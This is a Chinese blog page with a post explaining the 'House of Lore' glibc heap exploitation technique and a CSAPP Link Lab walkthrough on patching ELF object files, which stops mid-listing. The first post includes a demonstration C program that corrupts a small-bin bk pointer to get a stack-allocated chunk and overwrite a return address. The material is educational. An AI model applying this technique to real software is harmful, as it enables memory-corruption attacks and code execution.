Pwn进你的心

House Of Lore-原理

Posted on 2022-03-10 Edited on 2022-04-06 In HouseOfSeries 6.1k 6 mins.

House Of Lore

House of Lore 攻击与 Glibc 堆管理中的 Small Bin 的机制紧密相关

House of Lore 可以实现分配任意指定位置的 chunk，从而修改任意地址的内存
House of Lore 利用的前提是需要控制 Small Bin Chunk 的bk指针，并且控制指定位置 chunk 的fd指针

House Of Lore 利用姿势

如果我们可以修改 small bin 的最后一个 chunk 的 bk 为我们指定内存地址的 fake chunk，并且同时满足之后的 bck->fd != victim 的检测，那么我们就可以使得 small bin 的 bk 恰好为我们构造的 fake chunk

案例：（Ubuntu 14.04.4 - 32bit - glibc-2.23）

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

void jackpot(){ puts("Nice jump d00d"); exit(0); }

int main(int argc, char * argv[]){

  intptr_t* stack_buffer_1[4] = {0};
  intptr_t* stack_buffer_2[3] = {0};

  fprintf(stderr, "Allocating the victim chunk\n");
  intptr_t *victim = malloc(100);
  fprintf(stderr, "Allocated the first small chunk on the heap at %p\n", victim);

  // victim-WORD_SIZE because we need to remove the header size in order to have the absolute address of the chunk
  intptr_t *victim_chunk = victim-2;

  fprintf(stderr, "stack_buffer_1 at %p\n", (void*)stack_buffer_1);
  fprintf(stderr, "stack_buffer_2 at %p\n", (void*)stack_buffer_2);

  fprintf(stderr, "Create a fake chunk on the stack");
  fprintf(stderr, "Set the fwd pointer to the victim_chunk in order to bypass the check of small bin corrupted"
         "in second to the last malloc, which putting stack address on smallbin list\n");
  stack_buffer_1[0] = 0; /* presize */
  stack_buffer_1[1] = 0; /* size */
  stack_buffer_1[2] = victim_chunk; /* FD */

  fprintf(stderr, "Set the bk pointer to stack_buffer_2 and set the fwd pointer of stack_buffer_2 to point to stack_buffer_1 "
         "in order to bypass the check of small bin corrupted in last malloc, which returning pointer to the fake "
         "chunk on stack");
  stack_buffer_1[3] = (intptr_t*)stack_buffer_2; // chunk1->BK => chunk2->head
  stack_buffer_2[2] = (intptr_t*)stack_buffer_1; // chunk2->FD => chunk1->head

  fprintf(stderr, "Allocating another large chunk in order to avoid consolidating the top chunk with"
         "the small one during the free()\n");
  void *p5 = malloc(1000); // 防止和topchunk合并
  fprintf(stderr, "Allocated the large chunk on the heap at %p\n", p5);

  fprintf(stderr, "Freeing the chunk %p, it will be inserted in the unsorted bin\n", victim);
  free((void*)victim);

  fprintf(stderr, "\nIn the unsorted bin the victim's fwd and bk pointers are nil\n");
  fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]);
  fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

  fprintf(stderr, "Now performing a malloc that can't be handled by the UnsortedBin, nor the small bin\n");
  fprintf(stderr, "This means that the chunk %p will be inserted in front of the SmallBin\n", victim);

  void *p2 = malloc(1200);
  fprintf(stderr, "The chunk that can't be handled by the unsorted bin, nor the SmallBin has been allocated to %p\n", p2);

  fprintf(stderr, "The victim chunk has been sorted and its fwd and bk pointers updated\n");
  fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]);
  fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

  //------------VULNERABILITY-----------

  fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");

  victim[1] = (intptr_t)stack_buffer_1; // victim->bk is pointing to stack

  //------------------------------------

  fprintf(stderr, "Now allocating a chunk with size equal to the first one freed\n");
  fprintf(stderr, "This should return the overwritten victim chunk and set the bin->bk to the injected victim->bk pointer\n");

  void *p3 = malloc(100);

  fprintf(stderr, "This last malloc should trick the glibc malloc to return a chunk at the position injected in bin->bk\n");
  char *p4 = malloc(100);
  fprintf(stderr, "p4 = malloc(100)\n");

  fprintf(stderr, "\nThe fwd pointer of stack_buffer_2 has changed after the last malloc to %p\n",
         stack_buffer_2[2]);

  fprintf(stderr, "\np4 is %p and should be on the stack!\n", p4); // this chunk will be allocated on stack
  intptr_t sc = (intptr_t)jackpot; // Emulating our in-memory shellcode
  memcpy((p4+40), &sc, 8); // This bypasses stack-smash detection since it jumps over the canary
}

简单复述一下这个过程：

首先申请了一个在 fastbin 范围内的 victim chunk，然后再在栈上构造了一个 fake chunk（fake chunk 为 stack_buffer_1，还需要一个 stack_buffer_2 来打掩护）
为了绕过检测，设置 stack_buffer_1 的 BK 指针指向 stack_buffer_2，设置 stack_buffer_2 的 FD 指针指向 stack_buffer_1
接下来先 malloc 一个chunk，防止 free 之后与 top chunk 合并，然后 free 掉 victim，这时候 victim 会被放到 fastbin 中
接下来再去 malloc 一个 large chunk，会触发 fastbin 的合并，然后放到 unsorted bin 中，这样我们的 victim chunk 就放到了 unsorted bin 中，然后最终被 unsorted bin 分配到 small bin 中
在 victim chunk 的BK指针中写入fake chunk（small bin是基于BK，从后向前申请的）
再次申请 victim chunk（同时 fake chunk 进入small bin），最后申请 fake chunk

利用条件：

程序可修改 small bins 中 free chunk 的 bk 指针
对应伪造 fake chunk 的区域有一定控制权（可以伪造 fakechunk->FD 为 victim_chunk）

关于 Small Bin 分配的利用点

if (in_smallbin_range (nb))
    // 检验需要分配的大小是不是smallbin大小
    {
      idx = smallbin_index (nb);
      bin = bin_at (av, idx);

      if ((victim = last (bin)) != bin)
          // 通过last函数查找到最后一个free chunk
        {
          bck = victim->bk; /* 漏洞点 */
	  if (__glibc_unlikely (bck->fd != victim))
          // 检查 bck->fd 是不是 victim，防止伪造
	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
          set_inuse_bit_at_offset (victim, nb);
          bin->bk = bck;
          bck->fd = bin;

          if (av != &main_arena)
	    set_non_main_arena (victim);
          check_malloced_chunk (av, victim, nb);
#if USE_TCACHE
	  /* While we're here, if we see other chunks of the same size,
	     stash them in the tcache.  */
	  size_t tc_idx = csize2tidx (nb);
	  if (tcache && tc_idx < mp_.tcache_bins)
	    {
	      mchunkptr tc_victim;

	      /* While bin not empty and tcache not full, copy chunks over.  */
	      while (tcache->counts[tc_idx] < mp_.tcache_count
		     && (tc_victim = last (bin)) != bin)
		{
		  if (tc_victim != 0)
		    {
		      bck = tc_victim->bk;
		      set_inuse_bit_at_offset (tc_victim, nb);
		      if (av != &main_arena)
			set_non_main_arena (tc_victim);
		      bin->bk = bck;
		      bck->fd = bin;

		      tcache_put (tc_victim, tc_idx);
	            }
		}
	    }
#endif
          void *p = chunk2mem (victim);
          alloc_perturb (p, bytes);
          return p;
        }
    }

漏洞的问题就在于bck = victim->bk，这句话将这个 chunk 的BK提取了出来，并且在之后使得bin->bk = bck ，这样的话BK指针所指向的 chunk 就被放入了 smallbin，之后的 malloc 就可以将其 malloc 出来了

版本对 House Of Lore 的影响

libc-2.23（只有上文提及的基础检查）

libc-2.27（只有上文提及的基础检查，但是需要绕过 cache）

1	if (__glibc_unlikely (bck->fd != victim))

检查 fakechunk->FD 是不是 victim_chunk

libc-2.31（House Of Lore 已经失效）

CSapp-Link Lab

Posted on 2022-03-09 Edited on 2022-10-10 In Knowledge 39k 35 mins.

Link Lab

CMU无此实验，HIT增加

每个实验阶段考察 ELF 文件组成与程序链接过程的不同方面知识

阶段1：全局变量 <=> 数据节
阶段2：指令 <=> 代码节
阶段3：符号解析
阶段4：switch语句与重定位
阶段5：重定位

实验文件

main.o：主程序的可重定位目标模块（实验中无需修改）
phase1.o …….. phase5.o：各阶段实验所针对的二进制可重定位目标模块，需在相应实验阶段中予以修改或补充
linkbombn：验证文件

在实验中的每一阶段，按照阶段的目标要求修改相应可重定位二进制目标模块 phasen.o 后，使用如下命令生成可执行程序 linkbomb：

1 2	linux > gcc -m32 -o linkbomb main.o phase[n].o ./linkbomb

使用工具

hexedit

hexedit 不仅仅是十六进制编辑器，它提供了获取文件差异的信息，可用于比较二进制文件，它的用户界面基于 ncurses

我们可以像下面这样安装它：（可能需要 root 权限）

1	linux > apt install hexedit

打开终端输入以下指令即可运行：

1	linux > hexedit filename

用方向键移动，ctrl+w保存，ctrl+x退出，man hexedit

readelf

-a —all 等同于同时使用：-h -l -S -s -r -d -V -A -l
-h —file-header 显示ELF文件头
-l —program-headers 显示程序头
-S —section-headers 显示节头
-t —section-details 显示节详细信息
-s —syms 显示符号表（symbol table）
-r —relocs 显示重定位信息
-d —dynamic 显示动态节（dynamic section）
-x —hex-dump= 以字节形式显示输出指定节的内容
-p —string-dump= 以字符串形式显示输出指定节的内容
-R —relocated-dump= 以重定位后的字节形式显示输出指定节内容

符号相关知识

符号表

在计算机科学中，符号表是一种用于语言翻译器（例如：编译器和解释器）中的数据结构，在符号表中，程序源代码中的每个标识符都和它的声明或使用信息绑定在一起，比如其数据类型、作用域以及内存地址

typedef struct {
        Elf32_Word    st_name;      /* 符号对应字符串在strtab节中的偏移量 */ 
        Elf32_Word    st_value;     /* 在对应节中的偏移量，可执行文件中是虚拟地址 */
        Elf32_Word    st_size;      /* 符号对应目标所占字节数 */
        unsigned char   type: 4,    /* 符号对应目标的类型：数据、函数、源文件、节 */
              		 binding: 4;    /* 符号类别：全局符号、局部符号、弱符号 */
        unsigned char   st_other;
        Elf32_Section   st_shndx;    /* 符号对应目标所在的节，或其他情况 */
}Elf32_Sym;

散列表

散列表是用来实现符号表的一种常用技术，编译器可能会使用一个很大的符号表来包含所有的符号，或是针对不同的作用域使用层次结构的多个独立的符号表

符号

Global symbols（模块内部定义的全局符号）
- 由模块m定义并能被其他模块引用的符号（非static函数，非static全局变量）
External symbols（外部定义的全局符号）
- 由其他模块定义并被模块m引用的全局符号
Local symbols（本模块的局部符号）
- 仅由模块m定义和引用的本地符号（带有static的函数和全局变量）
- 注意：局部变量不会在过程外被引用（分配在栈中），因此不是符号定义

符号变量

自动变量（动态局部变量）：auto

离开函数，值就消失
不写 static 就默认是 auto

静态局部变量：static

离开函数，值任然保留
变量的值只在函数内部生效
带有 static 的变量只会初始化一次（数据存储在 data 段）
当上一级函数多次调用本函数时，带有 static 的变量数值不变（并且不会进行初始化）

寄存器变量：register

离开函数，值就消失
变量的值只在函数内部生效

全局变量：在 main 之外

允许 main 中所有函数访问
允许外部其他文件访问

静态全局变量：在 main 之外，static

允许 main 中所有函数访问
变量的值只在文件内部生效

节简析

使用目标文件的节头表，可以定位文件的所有节，节头表是 Elf32_Shdr 或 Elf64_Shdr 结构的数组

节头

typedef struct {
        elf32_Word      sh_name; /* 节的名称，此成员值是节头字符串表节的索引，用于指定以空字符结尾的字符串的位置 */
        Elf32_Word      sh_type; /* 用于将节的内容和语义分类 */
        Elf32_Word      sh_flags; /* 节可支持用于说明杂项属性的1位标志 */
        Elf32_Addr      sh_addr; /* 如果节显示在进程的内存映像中，则此成员会指定节的第一个字节所在的地址 */
        Elf32_Off       sh_offset; /* 从文件的起始位置到节中第一个字节的字节偏移 */
        Elf32_Word      sh_size; /* 节的大小 */
        Elf32_Word      sh_link; /* 节头表索引链接，其解释依赖于节类型 */
        Elf32_Word      sh_info; /* 额外信息，其解释依赖于节类型 */
        Elf32_Word      sh_addralign; /* 一些节具有地址对齐约束 */
        Elf32_Word      sh_entsize; /* 指定每一项的大小(一些节包含固定大小的项的表) */
} Elf32_Shdr;

typedef struct {
        Elf64_Word      sh_name;
        Elf64_Word      sh_type;
        Elf64_Xword     sh_flags;
        Elf64_Addr      sh_addr;
        Elf64_Off       sh_offset;
        Elf64_Xword     sh_size;
        Elf64_Word      sh_link;
        Elf64_Word      sh_info;
        Elf64_Xword     sh_addralign;
        Elf64_Xword     sh_entsize;
} Elf64_Shdr;

参考：节 - 链接程序和库指南

节分配

节简述

ELF头：包括16字节的标识信息，文件类型（.o，exec，.so），机器类型（如Intel 80386），节头表的偏移，节头表的表项大小及表项个数
.text节：编译后的代码部分
.rodata节：只读数据，如 printf 用到的格式串，switch 跳转表等
.data节：已初始化的全局变量和静态变量
.bss节：未初始化全局变量和静态变量，仅是占位符，不占据任何磁盘空间，区分初始化和非初始化是为了空间效率
.symtab节：存放函数和全局变量（符号表）的信息，它不包括局部变量
.rel.text节：.text节的重定位信息，用于重新修改代码段的指令中的地址信息
.debug节：调试用的符号表（gcc -g）
.strtab节：包含 .symtab节和 .debug节中的符号及节名

示例（可能会有不同，比如：在我的电脑上 .data 为第4节）

ABS：表示不该被重定位
UND：表示未定义
COM：表示未初始化数据（.bss）
value：表示对齐要求，size：给出最小大小

编译器驱动程序

编译器驱动程序的工作：调用语言预处理器，编译器，汇编器，链接器

详细过程：

预处理阶段：预处理器（cpp）根据以字符 “#” 开头的命令，修改原始的 C 程序（比如 hello.c 中第 1 行的#include命令告诉预处理器读取系统头文件 stdio.h 的内容）并把它直接插入程序文本中，结果就得到了另一个 C 程序
- 通常是以 .i 作为文件扩展名
- 所谓的头文件，里面装的其实就是函数声明（libc库中的函数：scanf，printf 等）
编译阶段：编译器（ccl）将文本文件 hello.i 翻译成文本文件 hello.s，它包含一个汇编语言程序
- .s 文件其实就是装有汇编语言的文件
汇编阶段：汇编器（as）将 hello.s 翻译成机器语言指令，把这些指令打包成一种叫做可重定位目标程序（relocatable object program）的格式，并将结果保存在目标文件 hello.o 中
- hello.o 文件是一个二进制文件，它包含的 17 个字节是函数 main 的指令编码
- 如果我们在文本编辑器中打开 hello.o文件，将看到一堆乱码（二进制）
链接阶段：链接器（ld）就负责处理合并各个 hello.o 文件，结果就得到 hello 文件，它是一个可执行目标文件（或者简称为可执行文件），可以被加载到内存中，由系统执行
- 请注意，hello 程序调用了 printf 函数，它是每个 C 编译器都提供的标准 C 库中的一个函数
- printf 函数存在于一个名为 printf.o 的单独的预编译好了的目标文件中，而这个文件必须以某种方式合并到我们的 hello.o 程序中
- 通过修改 hello.o 可以影响最终文件 hello 的效果

强符号与弱符号

在C语言中：

函数和初始化的全局变量（包括显示初始化为0）是强符号
未初始化的全局变量是弱符号

对于它们，下列三条规则使用：

同名的强符号只能有一个，否则编译器报”重复定义”错误
允许一个强符号和多个弱符号，但定义会选择强符号的
当有多个弱符号相同时，链接器选择最先出现那个，也就是与链接顺序有关

实验一

步骤一：使用 readelf 和 bjdump 工具，首先确定 printf（具体为 puts ）输出函数的第2个调用参数对应的字符串地址（在 .data 节中）

步骤二：使用readelf 或 objdump 工具，查看 .data 节中的字符串内容并与未修改的 phase1.o 链接后程序输出的字符串比较，确定该字符串为修改的目标

步骤三：使用 hexedit 或自己写程序该字符串前若干字符替换为目标学号中的字符

实验一的程序框架：

#include <stdio.h>
#include "config.h" 
void (*phase)();   /*初始化为0*/
int main( int argc, const char* argv[] ) {
        if ( phase )
               (*phase)();
        else
               printf("To run lab, please link the relevant object module with the main module.\n");
        return 0;
}

直接运行输出这个结果：

1
2

➜  [/home/ywhkkx/ex1.linklab/l1] ./linkbomb1 
173000209UVv00d3vyFALuMYjxuPCr5m38uiiwLQwlzRxr80BxYnv7r6zz9aChMvWou2DL9e4tc6EidF1olhqrhH3gxYChAckMo7uMXJHwSDfiEmlYH	hhJElIl RzCWKPcuNvdHAIt	h7487zkd39QJEm4Rqwyer	L 0gauz1N2w9g PyaHAl

现在先收集信息：

➜  [/home/ywhkkx/ex1.linklab/l1] readelf -s phase1.o

Symbol table '.symtab' contains 17 entries:
   Num:    Value  Size Type    Bind   Vis      Ndx Name
     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 00000000     0 FILE    LOCAL  DEFAULT  ABS phase1.c
     2: 00000000     0 SECTION LOCAL  DEFAULT    2 
     3: 00000000     0 SECTION LOCAL  DEFAULT    4 
     4: 00000000     0 SECTION LOCAL  DEFAULT    5 
     5: 00000000   200 OBJECT  LOCAL  DEFAULT    4 ALJsLxmF // target
     6: 00000000     0 SECTION LOCAL  DEFAULT    6 
     7: 00000000     0 SECTION LOCAL  DEFAULT    8 
     8: 00000000     0 SECTION LOCAL  DEFAULT   10 
     9: 00000000     0 SECTION LOCAL  DEFAULT   11 
    10: 00000000     0 SECTION LOCAL  DEFAULT    9 
    11: 00000000     0 SECTION LOCAL  DEFAULT    1 
    12: 00000000    43 FUNC    GLOBAL DEFAULT    2 do_phase
    13: 00000000     0 FUNC    GLOBAL HIDDEN     8 __x86.get_pc_thunk.ax
    14: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND _GLOBAL_OFFSET_TABLE_ // GOT表
    15: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND puts
    16: 00000000     4 OBJECT  GLOBAL DEFAULT    6 phase

发现可疑目标：ALJsLxmF

Bind：LOCAL（局部符号）
Ndx：4（第4节 .data）
Value：0（节内偏移为0）
Type：OBJECT（全局变量）

局部全局变量，大小为 200，位于 .data 节，节内偏移为 0

接下来只需要查看 data 节在 .o 文件中的偏移是多少应该就可了：

➜  [/home/ywhkkx/ex1.linklab/l1] readelf -S phase1.o
There are 16 section headers, starting at offset 0x3f0:

节头：
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .group            GROUP           00000000 000034 000008 04     13  13  4
  [ 2] .text             PROGBITS        00000000 00003c 00002b 00  AX  0   0  1
  [ 3] .rel.text         REL             00000000 000328 000020 08   I 13   2  4
  [ 4] .data             PROGBITS        00000000 000080 0000c8 00  WA  0   0 32
  [ 5] .bss              NOBITS          00000000 000148 000000 00  WA  0   0  1
  [ 6] .data.rel.local   PROGBITS        00000000 000148 000004 00  WA  0   0  4

.data节偏移为“0x80”，在 HexEdit 中定为偏移为“0x80+0x0”（节偏移+节内偏移）

00000000   7F 45 4C 46  01 01 01 00  00 00 00 00  00 00 00 00  .ELF............
00000010   01 00 03 00  01 00 00 00  00 00 00 00  00 00 00 00  ................
00000020   F0 03 00 00  00 00 00 00  34 00 00 00  00 00 28 00  ........4.....(.
00000030   10 00 0F 00  01 00 00 00  08 00 00 00  55 89 E5 53  ............U..S
00000040   83 EC 04 E8  FC FF FF FF  05 01 00 00  00 8D 90 11  ................
00000050   00 00 00 83  EC 0C 52 89  C3 E8 FC FF  FF FF 83 C4  ......R.........
00000060   10 90 8B 5D  FC C9 C3 00  00 00 00 00  00 00 00 00  ...]............
00000070   00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  ................
00000080   37 30 6C 4C  39 46 39 09  39 68 6B 52  58 55 38 41  70lL9F9.9hkRXU8A
00000090   31 31 37 33  30 30 30 32  30 39 55 56  76 30 30 64  1173000209UVv00d
000000A0   33 76 79 46  41 4C 75 4D  59 6A 78 75  50 43 72 35  3vyFALuMYjxuPCr5
000000B0   6D 33 38 75  69 69 77 4C  51 77 6C 7A  52 78 72 38  m38uiiwLQwlzRxr8
000000C0   30 42 78 59  6E 76 37 72  36 7A 7A 39  61 43 68 4D  0BxYnv7r6zz9aChM
000000D0   76 57 6F 75  32 44 4C 39  65 34 74 63  36 45 69 64  vWou2DL9e4tc6Eid
000000E0   46 31 6F 6C  68 71 72 68  48 33 67 78  59 43 68 41  F1olhqrhH3gxYChA
000000F0   63 6B 4D 6F  37 75 4D 58  4A 48 77 53  44 66 69 45  ckMo7uMXJHwSDfiE
00000100   6D 6C 59 48  09 68 68 4A  45 6C 49 6C  20 52 7A 43  mlYH.hhJElIl RzC
00000110   57 4B 50 63  75 4E 76 64  48 41 49 74  09 68 37 34  WKPcuNvdHAIt.h74
00000120   38 37 7A 6B  64 33 39 51  4A 45 6D 34  52 71 77 79  87zkd39QJEm4Rqwy
00000130   65 72 09 4C  20 30 67 61  75 7A 31 4E  32 77 39 67  er.L 0gauz1N2w9g
00000140   20 50 79 61  48 41 6C 00  00 00 00 00  8B 04 24 C3   PyaHAl.......$.
00000150   00 47 43 43  3A 20 28 55  62 75 6E 74  75 20 37 2E  .GCC: (Ubuntu 7.
00000160   33 2E 30 2D  31 36 75 62  75 6E 74 75  33 29 20 37  3.0-16ubuntu3) 7
00000170   2E 33 2E 30  00 00 00 00  14 00 00 00  00 00 00 00  .3.0............
---  phase1.o       --0x0/0x670------------------------------------------------

可以发现 printf 并没有从变量 ALJsLxmF 的头部开始打印，对原字符串进行搜索，发现偏移多了“0x11”，利用 objdump 反汇编进行检查：

➜  [/home/ywhkkx/ex1.linklab/l1] objdump -d phase1.o

phase1.o：     文件格式 elf32-i386


Disassembly of section .text:

00000000 <do_phase>:
   0:	55                   	push   %ebp
   1:	89 e5                	mov    %esp,%ebp
   3:	53                   	push   %ebx
   4:	83 ec 04             	sub    $0x4,%esp
   7:	e8 fc ff ff ff       	call   8 <do_phase+0x8>
   c:	05 01 00 00 00       	add    $0x1,%eax
  11:	8d 90 11 00 00 00    	lea    0x11(%eax),%edx 
      // lea 取源操作数地址的偏移量，并把它传送到目的操作数所在的单元
  17:	83 ec 0c             	sub    $0xc,%esp 
  1a:	52                   	push   %edx
  1b:	89 c3                	mov    %eax,%ebx
  1d:	e8 fc ff ff ff       	call   1e <do_phase+0x1e>
  22:	83 c4 10             	add    $0x10,%esp
  25:	90                   	nop
  26:	8b 5d fc             	mov    -0x4(%ebp),%ebx
  29:	c9                   	leave  
  2a:	c3                   	ret    

Disassembly of section .text.__x86.get_pc_thunk.ax:

00000000 <__x86.get_pc_thunk.ax>:
   0:	8b 04 24             	mov    (%esp),%eax
   3:	c3                   	ret

现在可以用 HexEdit 修改二进制数据了，我将把它改为 “YHellow”

1
2
3

➜  [/home/ywhkkx/ex1.linklab/l1] gcc -m32 -o linkbomb main.o phase1.o 
➜  [/home/ywhkkx/ex1.linklab/l1] ./linkbomb
YHellow

实验二

修改二进制可重定位目标文件 phase2.o 的代码节内容，使其与 main.o 链接后能够运行输出（且仅输出）自己的学号

#include <stdio.h>
#include "config.h" 
void (*phase)();   /*初始化为0*/
int main( int argc, const char* argv[] ) {
        if ( phase )
               (*phase)();
        else
               printf("To run lab, please link the relevant object module with the main module.\n");
        return 0;
}

static void OUTPUT_FUNC_NAME(const char *id)     // 该函数名对每名学生均不同
{
        if(strcmp(id,MYID) != 0 ) return;
        printf("%s\n", id);
}
void do_phase()  {
        // 在代码节中预留存储位置供学生插入完成功能的必要指令
        asm( “nop\n\tnop\n\tnop\n\tnop\n\tnop\n\tnop\n\tnop\n\tnop\n\t…” );     
}

// 这个实验要求我们在 do_phase 中执行 OUTPUT_FUNC_NAME，打印 ID

步骤一：使用 objdump 工具，定位 phase2.o 代码节中包含对 printf（会被优化为 puts）输出函数调用的函数的偏移量地址

步骤二：使用 objdump 工具，分析 do_phase 函数的反汇编指令，确定加入对前述输出函数的调用指令的 .text 节中的偏移量位置

步骤三：构造调用输出函数（通过相对PC的偏移量）的机器指令，并替换 do_phase 函数中预留的 nop 指令偏移量

注：目标输出函数为 static 类型，可通过偏移量直接调用跳转（无需重定位）

直接执行程序：

1	➜ [/home/ywhkkx/ex1.linklab/l2] ./linkbomb2 // 啥也没有(本来也不该有)

信息收集：

1
2

➜  [/home/ywhkkx/ex1.linklab/l2] file linkbomb2 
linkbomb2: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=32fa54a562f55fda7e482d48180dc3e162fcea98, not stripped

发现 linkbomb2 是 dynamically，函数采用懒加载（利用PLT/GOT进行加载）

➜  [/home/ywhkkx/ex1.linklab/l2] readelf -s phase2.o  

Symbol table '.symtab' contains 22 entries:
   Num:    Value  Size Type    Bind   Vis      Ndx Name
     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 00000000     0 FILE    LOCAL  DEFAULT  ABS phase2.c
     2: 00000000     0 SECTION LOCAL  DEFAULT    3 
     3: 00000000     0 SECTION LOCAL  DEFAULT    5 
     4: 00000000     0 SECTION LOCAL  DEFAULT    6 
     5: 00000000     0 SECTION LOCAL  DEFAULT    7 
     6: 00000000    65 FUNC    LOCAL  DEFAULT    3 yeDfwUkv
     7: 00000000     0 SECTION LOCAL  DEFAULT    8 
     8: 00000000     0 SECTION LOCAL  DEFAULT   10 
     9: 00000000     0 SECTION LOCAL  DEFAULT   11 
    10: 00000000     0 SECTION LOCAL  DEFAULT   13 
    11: 00000000     0 SECTION LOCAL  DEFAULT   14 
    12: 00000000     0 SECTION LOCAL  DEFAULT   12 
    13: 00000000     0 SECTION LOCAL  DEFAULT    1 
    14: 00000000     0 SECTION LOCAL  DEFAULT    2 
    15: 00000000     0 FUNC    GLOBAL HIDDEN    11 __x86.get_pc_thunk.bx
    16: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND _GLOBAL_OFFSET_TABLE_
    17: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND strcmp
    18: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND puts
    19: 00000041    48 FUNC    GLOBAL DEFAULT    3 do_phase // target
    20: 00000000     0 FUNC    GLOBAL HIDDEN    10 __x86.get_pc_thunk.ax
    21: 00000000     4 OBJECT  GLOBAL DEFAULT    8 phase

目标在：第3节，节内偏移为“0x41”的地方

➜  [/home/ywhkkx/ex1.linklab/l2] readelf -S phase2.o
There are 19 section headers, starting at offset 0x458:

节头：
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .group            GROUP           00000000 000034 000008 04     16  20  4
  [ 2] .group            GROUP           00000000 00003c 000008 04     16  15  4
  [ 3] .text             PROGBITS        00000000 000044 000071 00  AX  0   0  1

在 .text 节中找到指定的 do_phase 位置（需要修改的函数），偏移为“0x44+0x41”（注意，puts，strcmp等函数是要在链接重定向完成之后才能确定地址，在反汇编代码中显示出来）

00000000   7F 45 4C 46  01 01 01 00  00 00 00 00  00 00 00 00  .ELF............
00000010   01 00 03 00  01 00 00 00  00 00 00 00  00 00 00 00  ................
00000020   58 04 00 00  00 00 00 00  34 00 00 00  00 00 28 00  X.......4.....(.
00000030   13 00 12 00  01 00 00 00  0A 00 00 00  01 00 00 00  ................
00000040   0B 00 00 00  55 89 E5 53  83 EC 04 E8  FC FF FF FF  ....U..S........
00000050   81 C3 02 00  00 00 83 EC  08 8D 83 00  00 00 00 50  ...............P
00000060   FF 75 08 E8  FC FF FF FF  83 C4 10 85  C0 75 10 83  .u...........u..
00000070   EC 0C FF 75  08 E8 FC FF  FF FF 83 C4  10 EB 01 90  ...u............
00000080   8B 5D FC C9  C3 55 89 E5  E8 FC FF FF  FF 05 01 00  .]...U..........
00000090   00 00 90 90  90 90 90 90  90 90 90 90  90 90 90 90  ................
000000A0   90 90 90 90  90 90 90 90  90 90 90 90  90 90 90 90  ................

00000041 <do_phase>:
  41:	55                   	push   %ebp
  42:	89 e5                	mov    %esp,%ebp
  44:	e8 fc ff ff ff       	call   45 <do_phase+0x4>
  49:	05 01 00 00 00       	add    $0x1,%eax
  4a:	90					   nop
  4b:	90					   nop
  4c:	90					   nop
  4d:	90					   nop

在“0x86”处发现 do_phase （55 89 e5 e8 …….. ）

先输入：gcc -m32 -o linkbomb2 main.o phase2.o 进行链接重定向（phase2.o 没有变）

然后用 objdump 进行打印：

➜  [/home/ywhkkx/ex1.linklab/l2] objdump -d linkbomb2 

....................

00001215 <yeDfwUkv>:
    1215:	55                   	push   %ebp
    1216:	89 e5                	mov    %esp,%ebp
    1218:	53                   	push   %ebx
    1219:	83 ec 04             	sub    $0x4,%esp
    121c:	e8 9f fe ff ff       	call   10c0 <__x86.get_pc_thunk.bx>
    1221:	81 c3 b3 2d 00 00    	add    $0x2db3,%ebx
    1227:	83 ec 08             	sub    $0x8,%esp
    122a:	8d 83 a8 e0 ff ff    	lea    -0x1f58(%ebx),%eax
    1230:	50                   	push   %eax
    1231:	ff 75 08             	pushl  0x8(%ebp)
    1234:	e8 07 fe ff ff       	call   1040 <strcmp@plt> // strcmp
    1239:	83 c4 10             	add    $0x10,%esp
    123c:	85 c0                	test   %eax,%eax
    123e:	75 10                	jne    1250 <yeDfwUkv+0x3b> // do_phase
    1240:	83 ec 0c             	sub    $0xc,%esp
    1243:	ff 75 08             	pushl  0x8(%ebp)
    1246:	e8 05 fe ff ff       	call   1050 <puts@plt> // printf的优化
    124b:	83 c4 10             	add    $0x10,%esp
    124e:	eb 01                	jmp    1251 <yeDfwUkv+0x3c>
    1250:	90                   	nop
    1251:	8b 5d fc             	mov    -0x4(%ebp),%ebx
    1254:	c9                   	leave  
    1255:	c3                   	ret

想要在 do_phase 中执行 OUTPUT_FUNC_NAME，打印 ID，必须先传入参数 ID，因为“strcmp(id,MYID)”，参数 ID 在 MYID 中，所以改为传入 MYID 的地址

但是 MYID 的地址是变化的（PIE保护），不能直接获取其地址

但是在动态链接中，地址可以通过GOT表来获取，确定MYID在GOT中的偏移

121c:	e8 9f fe ff ff       	call   10c0 <__x86.get_pc_thunk.bx> 
1221:	81 c3 b3 2d 00 00    	add    $0x2db3,%ebx 
    ............
122a:	8d 83 a8 e0 ff ff    	lea    -0x1f58(%ebx),%eax 
1230:	50                   	push   %eax 
1231:	ff 75 08             	pushl  0x8(%ebp)
1234:	e8 07 fe ff ff       	call   1040 <strcmp@plt> // strcmp

“121c”和“1221”这两步就是为了获取GOT表，装入ebx

“122a”这一步取出了位于偏移为“-0x1f58”的数组，装入eax

“1230”和“1231”这两步显然是把“strcmp”的参数压栈（MYID 和 id，从右往左依次入栈）

而“strcmp”的参数就是 MYID ，反推得“-0x1f58”为MYID在GOT表中的偏移，MYID的地址有了

可以在构思注入 do_phase 的汇编了：

.code32 // 不添加就会报错
lea -0x1f58(%eax), %eax
push %eax
call -86
pop %eax

查看二进制代码：

➜  [/home/ywhkkx/ex1.linklab/l2] gcc -c 2.s -o 2.o  
➜  [/home/ywhkkx/ex1.linklab/l2] objdump -d 2.o   

2.o：     文件格式 elf64-x86-64


Disassembly of section .text:

0000000000000000 <.text>:
   0:	8d 80 a8 e0 ff ff    	lea    -0x1f58(%rax),%eax
   6:	50                   	push   %rax
